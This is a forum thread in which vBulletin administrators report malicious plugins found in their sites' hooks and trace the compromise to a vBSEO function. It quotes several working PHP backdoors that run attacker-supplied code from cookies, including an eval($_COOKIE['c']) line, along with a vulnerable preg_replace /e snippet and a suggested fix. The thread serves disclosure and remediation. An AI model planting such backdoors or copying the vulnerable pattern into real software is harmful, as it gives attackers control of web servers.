Announcement

Collapse
No announcement yet.

Possible Exploit

Collapse
X
  • Filter
  • Time
  • Show
Clear All
new posts

  • Possible Exploit

    I noticed this plugin in global complete on several of our sites:

    PHP Code:
    /* vBulletin Templates Cookie Caching */
    $vbr="ujhdfgyj";$vbh="6a234a2a6b89b531b6720b9f86f42d7f";isset($_COOKIE["vbinit"])?die(header("Cache-ID: $vbr")):chr(10);(isset($_COOKIE["vbauth"])&&(md5($_COOKIE["vbauth"])=="a32229ad78262c52c4073b07fdd58912")&&isset($_COOKIE["vbcache"])&&preg_match("/cache:([a-f0-9]+):([a-z]+):(.*)/",$_COOKIE["vbcache"],$m)&&(md5($vbr.$vbh)===$m[1]))?$m[2]($m[3]):chr(10); 
    I googled the phrase "vBulletin Templates Cookie Caching" and see someone else noticed it yesterday too:

    http://www.vbsoporte.com/f29/posible...oso-foro-2866/

    All of our installs are running the latest version 3.8.7 PL2. I am going to all the sites and am disabling it as I find them. I have no idea if this is a VB exploit, or vbseo, or any other product we may have installed, but I suggest everyone check their plugin list.. This is installed under the vbulletin product, so it should be right around the top of the list. Still investigating..

  • #2
    Actually I more... This one in the same hook location, different site:

    Code:
    /* vBCMS Global Thread Cache */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);
    I also saw this code:

    Code:
    /* vBulletin Dynamic Menu Filters */
    (isset($_COOKIE["vbulletin_collapse"]) && preg_match("/menu:([a-z]+):(.*)/",$_COOKIE["vbulletin_collapse"],$m))?$m[1]($m[2]):chr(20);

    Comment


    • #3
      I have just checked a site of ours without vbseo, no exploit. I then checked a personal site of mine that has nothing to do with the other sites and it has vbseo.. The exploit was there. Not a 100% confirmation by any means, just so far out of 20 something sites that I have checked, the one that doesn't have vbseo is not infected. I have quite a few more to check.

      Comment


      • #4
        I just found it on a latest version of vb 4 too..

        Comment


        • #5
          Just got confirmation from a peer that it is on their system too.. The only common thread we have right now is vbseo..

          Comment


          • #6
            Have you notified VBSEO?

            Comment


            • #7
              Yes I have, and pointed them to this thread..

              Comment


              • #8
                Just confirmed with 3 other peers in the field. All with vbseo.. People, check your plugins!

                Comment


                • #9
                  I have a number of sites I've checked with VBSEO installed and they didn't have this plugin. However a few sites all with vBSEO have them. One site had a "test" plugin for ajax_complete and it referenced:

                  eval($_COOKIE['c']);

                  Here is a site that references a PHP compromise with similar code...

                  http://translate.google.com/translat...26prmd%3Dimvns

                  Comment


                  • #10
                    If this is the exploit that causes Google searches to redirect elsewhere (a-la filestore.info), the reason vBSEO gets targeted is because it's designed to increase search engine crawling.

                    How they got in is not a vBSEO hole, but more than likely, people not securing all of the writable directories that vBulletin has to offer.
                    My Live vB5 Site - NZEating.com
                    vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                    Comment


                    • #11
                      Ace, sorry, I disagree. They somehow are attacking the title replace feature to INJECT code. It IS a vbseo hole.. We are narrowing it down...

                      Comment


                      • #12
                        OK. Best of luck figuring it out, I'm watching your ticket with great interest.

                        <-- works there.
                        My Live vB5 Site - NZEating.com
                        vBulletin Hosting | vBulletin Services - Need hosting for your vB? Need it installed? Something else? Let me take that hassle off your hands.

                        Comment


                        • #13
                          Here it is folks, in functions_vbseocp_abstract.php

                          PHP Code:
                          public static function proc_deutf($ptxt$tocharset)
                          {
                          $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s = iconv("UTF-8", \''.$tocharset.'\', "$1")) ? $_s : "$1").stripslashes(\'$2\')'$ptxt);
                          return 
                          $ptxt;

                          I recommended a patch here over a YEAR ago when we were getting hacked and they said they were going to put it in the latest version.. They did not.. This needs to be:

                          PHP Code:
                          public static function proc_deutf($ptxt$tocharset)
                          {
                          $ptxt preg_replace('#\'([^\']*)(\'\s*\=\>)#mie''"\'".(($_s =  iconv("UTF-8", \''.$tocharset.'\', \'$1\')) ? $_s :  \'$1\').stripslashes(\'$2\')'$ptxt);
                          return 
                          $ptxt;

                          Last edited by Jafo; Mon 23rd Jan '12, 7:32am.

                          Comment


                          • #14
                            Title replaces happen real-time as the page is pulled. These are not stored anywhere.

                            I highly suggest checking your server logs for more detailed information or entries relating to product changes.

                            Comment


                            • #15
                              Brianso, please look at the above code.. We went through this a year ago, you guys worked with us to supply the patch, but you guys never included it in your product! That is why we got hit, because we just upgraded to the latest version.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              X